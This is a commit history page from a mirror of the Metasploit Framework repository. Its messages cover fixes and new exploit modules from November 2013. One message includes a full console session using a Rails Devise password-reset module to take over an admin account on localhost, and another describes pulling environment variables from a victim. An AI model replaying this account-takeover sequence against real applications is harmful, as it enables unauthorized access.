infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
21,889 Commits
7 Branches
556 Tags
419 MiB
Commit Graph

21889 Commits (14e600a4313a891653d92f2e3431ee9c99237194)

Author SHA1 Message Date
Jeff Jarmoc 03838aaa79 Update rails_devise_pass_reset.rb 
Fixed erroneous status if FLUSHTOKENS is false.
 2013-11-27 22:27:45 -06:00
OJ 0c59c885c4 Fix metsrv.dll name issue 
As mentioned here https://community.rapid7.com/thread/3788 the metsvc
script was still looking for the old file name for metsrv.dll, which
was causing the script to fail.

This commit fixes this issue. A hash is used to indicate local and remote
file names so that the remote can continue to use metsrv.dll, but it
is correctly located on disk locally.
 2013-11-28 11:48:11 +10:00
sinn3r a8af050c16 Update post module Apache Tomcat description 
This module's description needs to be more descriptive, otherwise
you kind of have to pull the source code to see what it actually
does for you.
 2013-11-27 19:21:27 -06:00
sinn3r a02e0ee3e4
Land #2682 - Kimai v0.9.2 'db_restore.php' SQL Injection 2013-11-27 19:10:44 -06:00
Jeff Jarmoc 7f8baf979d Adds the ability to configure object name in URI and XML. This allows exploiting other platforms that include devise. 
For example, activeadmin is exploitable if running a vulnerable devise and rails version with the following settings;
msf > use auxiliary/admin/http/rails_devise_pass_reset
msf auxiliary(rails_devise_pass_reset) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf auxiliary(rails_devise_pass_reset) > set RPORT 3000
RPORT => 3000
msf auxiliary(rails_devise_pass_reset) > set TARGETEMAIL admin@example.com
TARGETEMAIL => admin@example.com
msf auxiliary(rails_devise_pass_reset) > set TARGETURI /admin/password
TARGETURI => /admin/password
msf auxiliary(rails_devise_pass_reset) > set PASSWORD msf_pwnd
PASSWORD => msf_pwnd
msf auxiliary(rails_devise_pass_reset) > set OBJECTNAME admin_user
OBJECTNAME => admin_user
msf auxiliary(rails_devise_pass_reset) > exploit

[*] Clearing existing tokens...
[*] Generating reset token for admin@example.com...
[+] Reset token generated successfully
[*] Resetting password to "msf_pwnd"...
[+] Password reset worked successfully
[*] Auxiliary module execution completed
msf auxiliary(rails_devise_pass_reset) >
 2013-11-27 15:35:43 -06:00
Peter Toth 95a98529c4 Removed script launcher wrapper and fixed the file_exists so that the module now detects input 2013-11-27 21:38:20 +01:00
William Vu 77b036ce5d
Land #2703, uninit const fix for MSSQL_SQLI 2013-11-27 13:50:48 -06:00
William Vu 05dfc161e4
Land #2702, uninit const fix for HttpClient 2013-11-27 13:47:13 -06:00
jvazquez-r7 a5aca618e2 fix fail_with usage on Exploit::Remote::MSSQL_SQLI 2013-11-27 11:33:19 -06:00
jvazquez-r7 a32c9e5efc Fix fail_with on Exploit::Remote::HttpClient 2013-11-27 11:19:46 -06:00
Peter Toth 347d438f90 Merge pull request #1 from jvennix-r7/review_osx_mount_pr 
Tweaks & fixes to osx mount PR
 2013-11-27 09:12:00 -08:00
jvazquez-r7 6c8df4be27
Land #2699, @wvu fix for Linux download_exec post module 2013-11-27 10:22:35 -06:00
jvazquez-r7 0343aef7c8
Land #2695, @wchen-r7's support to detect silverlight 2013-11-27 09:40:12 -06:00
joev 6561f149a8 DRY up URL_REGEX constant. 2013-11-27 06:16:25 -06:00
joev b0416b802d Change the Recent shares implementation. 
* Allows us to see protocol of Recent Shares
* Parses protocol from file share URL
 2013-11-27 06:08:48 -06:00
joev e876155e1a More tweaks to mount_share. 
* Adds some docs to some of the methods to further distinguish
the separate sets of shares.
 2013-11-27 05:45:46 -06:00
joev 485e38ebca Some code tweaks to post/osx/mount_share. 
* Make PROTOCOL an Enum
* Move path override options to advanced section
* More Enumerable rework
* Move one-off regexes back to inline, pull out protocol list
 2013-11-27 05:22:12 -06:00
William Vu f3e71c2c9d Be more specific 
Perl!
 2013-11-27 01:03:41 -06:00
William Vu b202b98a42 Anchor the scheme 2013-11-27 00:57:45 -06:00
William Vu e8da97aa17 Fix extraneous use of which and cmdsub 
I don't even.
 2013-11-27 00:43:07 -06:00
William Vu 288476441f Fix improper use of expand_path 
I don't even.
 2013-11-27 00:42:09 -06:00
OJ 468654d2b5 Add RDI submodule, port Kitrap0d 
This commit is the first in a series that will move all the exploits that use RDI
over to the R7 fork. The RDI source will be in a single known location and each
exploit will have to work from that location.

The kitrap0d exploit has been migrated over to use this submodule so that there's
one example of how it's done for future contributions to follow.
 2013-11-27 16:04:41 +10:00
James Lee 25b1ec5b75
Land #2689, getenv 2013-11-26 23:33:25 -06:00
OJ 72813c1f3e
Merge branch 'egypt/feature/getenv-php' into getenv_cmd 2013-11-27 15:22:15 +10:00
James Lee a3337e5de5
Add PHP side for meterpreter getenv 2013-11-26 23:16:28 -06:00
OJ a0f703ee44 Add getenv support to python meterpreter 
This change adds support for `getenv` to python meterpreter. Nothing too
complex going on here. I tidied up the definitions of the TLVs as well
so that they look nice.
 2013-11-27 11:19:26 +10:00
William Vu ee201a82cd
Land #2673, -x and -s for uploadexec meterp script 2013-11-26 16:26:38 -06:00
OJ 5fc9706268 Use Rex.sleep instead of sleep 2013-11-27 07:51:11 +10:00
sinn3r 5d10b44430 Add support for Silverlight 
Add support for Silverlight exploitation. [SeeRM #8705]
 2013-11-26 14:47:27 -06:00
William Vu be86a29048
Land #2694, indentation fixes for Gemfile 2013-11-26 13:47:00 -06:00
sinn3r a914fbc400
Land #2693 - case sensitive 2013-11-26 11:16:57 -06:00
Tod Beardsley 671c0d9473
Fix nokogiri typo 
[SeeRM #8730]
 2013-11-26 10:54:31 -06:00
James Lee a2743e4493
Land #2692, fix title for ms13_022 2013-11-26 10:51:00 -06:00
Tab Assassin c7d4cd9be2
Fix indendation on Gemfile 2013-11-26 10:48:50 -06:00
jvazquez-r7 253719d70c Fix title 2013-11-26 08:11:29 -06:00
sinn3r f1c5ab95bf
Land #2690 - typo 2013-11-25 23:53:34 -06:00
William Vu 70139d05ea Fix missed title 2013-11-25 22:46:35 -06:00
jvazquez-r7 6cb63cdad6
Land #2679, @wchen-r7's exploit for cve-2013-3906 2013-11-25 22:04:26 -06:00
jvazquez-r7 0079413e81 Full revert the change 2013-11-25 22:04:02 -06:00
sinn3r fa97c9fa7c Revert this change 2013-11-25 20:54:39 -06:00
sinn3r 3247106626 Heap spray adjustment by @jvazquez-r7 2013-11-25 20:50:53 -06:00
jvazquez-r7 4c249bb6e9 Fix heap spray 2013-11-25 20:06:42 -06:00
OJ 1a65566005 Add the getenv command which pulls env vars from the victim 
This command will allow the attacker to grab environment variables from the
target, if they exist. Calling this function allows for one or more values
to be passed in, which should match the name of the variable required. If
the variable is found, it is returned. If it is not found, the variable
is not returned (ie. it's not present in the resulting hash).

Note 1: POSIX environment vars are case-senstive, whereas Windows is not.
Note 2: POSIX doesn't seem to cough up user environment vars, it only returns
system vars. I'm not sure why this is, but it could be because of the way
we do linking on POSIX.
 2013-11-26 10:05:50 +10:00
sinn3r 385381cde2 Change target address 
This one tends to work better with our boxes
 2013-11-25 17:21:39 -06:00
jvazquez-r7 a7e6a79b15
Land #2685, @wchen-r7's update for the word injector description 2013-11-25 15:47:57 -06:00
William Vu c7c97c9543
Land #2688, TaskManager spec timeout increase 2013-11-25 15:42:43 -06:00
jvazquez-r7 92807d0399
Land #2676, @todb-r7 module for CVE-2013-4164 2013-11-25 15:40:33 -06:00
sinn3r 57f4f68559
Land #2652 - Apache Roller OGNL Injection 2013-11-25 15:14:35 -06:00
sinn3r 8005826160
Land #2644 - MS13-090 CardSpaceClaimCollection vuln 2013-11-25 13:06:09 -06:00
sinn3r 4773270ff0
Land #2677 - MS12-022 COALineDashStyleArray vuln 2013-11-25 12:58:45 -06:00